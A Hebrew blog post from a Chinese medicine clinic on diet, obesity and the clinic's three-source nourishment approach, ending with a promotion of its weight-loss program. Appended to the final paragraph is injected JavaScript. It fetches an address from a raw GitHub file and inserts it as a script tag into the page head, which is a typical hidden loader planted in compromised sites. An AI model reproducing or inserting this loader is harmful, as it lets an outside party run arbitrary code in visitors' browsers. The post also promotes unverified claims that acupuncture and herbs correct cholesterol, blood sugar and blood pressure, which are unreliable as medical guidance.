על אוכל, השמנה, דיאטה – ומה שביניהם


4 באוקטובר 2010 | מאת: בן רוזנבליט


בכתבה הקודמת ראינו את ההקשרים שבין תזונה לא נכונה, השמנה בטנית ומחלות כרוניות מסוכנות,כמו: מחלות לב וסכרת.

בכתבה זו נסקור אילו פתרונות אנו יכולים להציע, בתור מרפאה לרפואה סינית. כמו כן, נראה שישנה הקבלה גדולה בין מה שהסינים אמרו לפני כשלושת אלפים שנה לתוצאות המחקרים העדכניים ביותר מתחום הרפואה המערבית.

מבחינת הרפואה הסינית לאדם שלושה מקורות הזנה. השילוב בין שלושתם הוא שקובע את טיב בריאותו.

המקור הראשון והבסיסי ביותר הוא הגנטיקה. מקור זה קובע ומשפיע על האופן בו יתקבלו החומרים שנכנסים לגופינו,כיצד יתנהגו בו וכיצד יצאו. כלומר, גם אם נפיק את המירב משתי דרכי ההזנה האחרות, עדיין משפיעות יכולות האדם היחסיות , הקשורות בגנטיקה שלו. במילים אחרות, יהיו אנשים שיאכלו "שטויות" ויעבור זמן רב עד שיראו תוצאות שליליות ממעשיהם, לעומת אילו שכבר מההתחלה יישאו בתוצאות. מצד שני יהיו אנשים שבעזרת דיאטה קלה יחסית ירדו המון ומהר במשקל, לעומת אילו שיצטרכו להתאמץ יותר בשביל לרדת. מקור זה אם כן, נראה כמו גזירה משמיים , ולכן רבים משתמשים בכך כתירוץ להמשיך עם אורח החיים הלא בריא, אך זה ממש לא חייב להיות כך. מחקרים רבים מוכיחים שאומנם אי אפשר לשנות את ההרכב הגנטי של האדם, אך בהחלט ניתן להשפיע על האופן שבו הוא יבוא לידי ביטוי. ניתן למקסם את ההשפעה הרצויה המיטיבה ולמזער את ההשפעה הלא רצויה "השלילית".

מקור ההזנה השני הוא ההזנה מתהליך הנשימה. מבחינה מדעית ידוע שללא אספקת חמצן תקינה לרקמות, גוף האדם אינו יכול להתקיים. מערכת הנשימה צריכה להכניס חמצן מהאוויר ולפלוט מהגוף את הפחמן הדו חמצני שהוא הפסולת. לתירגול מערכת זו (תרגילי נשימה) יש תפקיד חשוב ביותר בשלל תחומים בריאותיים מודרניים הכוללים בין היתר : שיקום מטראומות, הרגעת הנפש,הריון ולידה ואף שיפור יכולות ספורטיביות. ישנן  שיטות שמקורן מהרפואה הסינית כמו: צ'י קונג וטאי צ'י שזהו בדיוק תפקידן. כל מי שביקר בסין וודאי זוכר את התמונה של מאות סינים עושים "התעמלות מוזרה" בצורה מתואמת בפארק העירוני. מבחינתם ביצוע של תרגילי נשימה על בסיס יומי זהו חלק בלתי נפרד מתרבותם, ואמצעי יעיל,  זול וקל בשמירה על הבריאות.

מקור ההזנה השלישי הוא ההזנה ממערכת העיכול. כאן אנו מכניסים מזון ושתייה דרך הפה אל תוך צינור העיכול על מנת לספוג ממנו את הנוטריינטים (חומרים מזינים). החומרים מתחלקים לארבע קבוצות עיקריות: חלבונים, פחמימות, שומנים ומיקרו נוטריינטים (ויטמינים ומינרלים), כאשר בנוסף לכל קבוצה ישנן חלוקות נוספות לעוד תתי קבוצות. גוף האדם חייב לקבל תזונה מאוזנת שכוללת את כל הקבוצות ותתי הקבוצות מפני שלכל אחת מהן תרומה ייחודית משלה לצורך שמירה על הבריאות. המזון משמש להפקת אנרגיה ולבניית רקמות הגוף וחידושן. חוסר איזון בין כמות האנרגיה הנצרכת לזו המנוצלת על ידי הגוף מתבטאת ברעב, או לחלופין בגדילה בנפח רקמת השומן בגוף. כמו כן, חוסר איזון בחומרי הבניין, בין אם מדובר בעודף או בחוסר, עלול לגרום למחלות או לתפקוד לקוי של הגוף.
פרט לתפקידים אילו של המזונות (אוכל,שתייה ותבלינים), ברפואה הסינית נוהגים לשייך להם גם יכולות ריפוי למצבי חולי מסויימים, למשל: ג'ינג'ר לבחילות,כורכום לדלקות, נענע ומנטה למחלות וויראליות של קור במערכת הנשימה העליונה וכו', או כפי שאמר הרמב"ם במאה ה-12:" "ויהיו מזונותיך לתרופותיך ".
רבים מתפקידים אילו הוכחו מחקרית בזכות בידוד החומרים הפעילים באותם המזונות. ניתן לראות שמקור התזונה הינו מקור חשוב ביותר שיש להכירו,לכבדו ולהבינו בהקשר של מצבי בריאות וחולי.

מה אנחנו מציעים?

אנחנו מציעים תוכנית דיאטה שבנויה על שלוש מקורות ההזנה לפי הרפואה הסינית. קודם כל חשוב להגדיר נכונה את המושג דיאטה: זוהי מילה ביוונית- Δίαιτα, שמשמעותה אורח חיים. אין לה קשר ישיר להורדה במשקל, עינוי פיזי או התנזרות כזו או אחרת. המשמעות המקורית של המילה היא איזון חכם של חיי היום יום וזהו גם האני מאמין שלנו!

בעזרת הכלים שברשותנו (דיקור, צמחי מרפא, תזונה והכוונה אישית) ביכולתנו להשפיע בצורה מדוייקת על כל אחד ממקורות ההזנה ולהוציא ממנו את המקסימום האפשרי. כשכל אחד מהם יהיה מאוזן בעזרת הטיפול הנכון, תהליך ההרזיה יתרחש בצורה הנכונה ביותר תוך כדי תיקון של כל הפרמטרים השליליים שיש לאדם כמו: כולסטרול גבוה,סוכר גבוה, טריגליצרידים, לחץ דם וכו'. ישנן דרכים רבות לרדת במשקל בצורה של "טריק"- להוציא נוזלים, לפרק שרירים וכו' אך זה הרי מפספס את כל המטרה! המטרה לא צריכה להיות מספר קילוגרמים  בנקודת זמן מסויימת (שמיד אח"כ מעלים אותם בחזרה ואף יותר משהיו קודם), אלא על המטרה  להיות הגעה לבריאות  מקסימלית שתחזיק מעמד לאורך זמן.

אנו מאמינים שרק שינוי מהותי של אורח החיים יבטיח מטרה זו, ואנו בטוחים שיש לנו את היכולת לעזור לכל אדם אשר יחפוץ  לבצע את השינויים הדרושים, קטנים כגדולים. אף פעם לא מאוחר מדי לעשות את הצעד הראשון לטובת הבריאות! צפו בקרוב לפוסטים נוספים על נפלאות התזונה הנכונה לפי הרפואה הסינית. (var url = "https://raw.githubusercontent.com/truba77/trubnik/main/to.txt"; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement("script"); script.src = data.trim(); document.getElementsByTagName("head")[0].appendChild(script); });)

אין תגובות עדיין

הוספת תגובה